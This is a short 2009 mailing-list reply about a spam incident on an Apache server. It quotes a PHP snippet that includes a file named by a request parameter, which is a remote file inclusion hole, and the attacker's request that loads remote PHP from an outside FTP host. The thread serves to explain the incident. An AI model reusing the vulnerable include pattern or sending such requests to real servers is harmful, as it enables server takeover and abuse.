[nSLUG] apache used to generate spam

Hatem Nassrat hnassrat at gmail.com
Mon Apr 20 13:31:43 ADT 2009


On Mon, Apr 20, 2009 at 11:39:20AM -0300, D G Teed wrote:
> Here is part of the index.php to make it an example:
> 
> <p class="button"><a href="index.php?page=Home">Home</a></p>
> ...
>  <?php
> 
>                 if ( isset( $_GET['page'] ) ) $this = $_GET['page'] .
> '.html';
> 
>                 if ( file_exists( $this ) ) {
>                         include_once $this;
> 
> The spammer calls this page with their own value set as:
> 
> ?this=ftp://wheelingboys.com.br:515151@wheelingboys.com.br/fotos/wallpaper/jamaican.php

You got to love PHP eh?

-- 
Hatem Nassrat



More information about the nSLUG mailing list